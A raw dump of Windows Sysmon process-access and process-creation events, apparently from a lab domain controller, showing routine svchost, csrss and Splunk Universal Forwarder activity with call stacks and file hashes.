13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.173{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.953{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.953{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.411{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 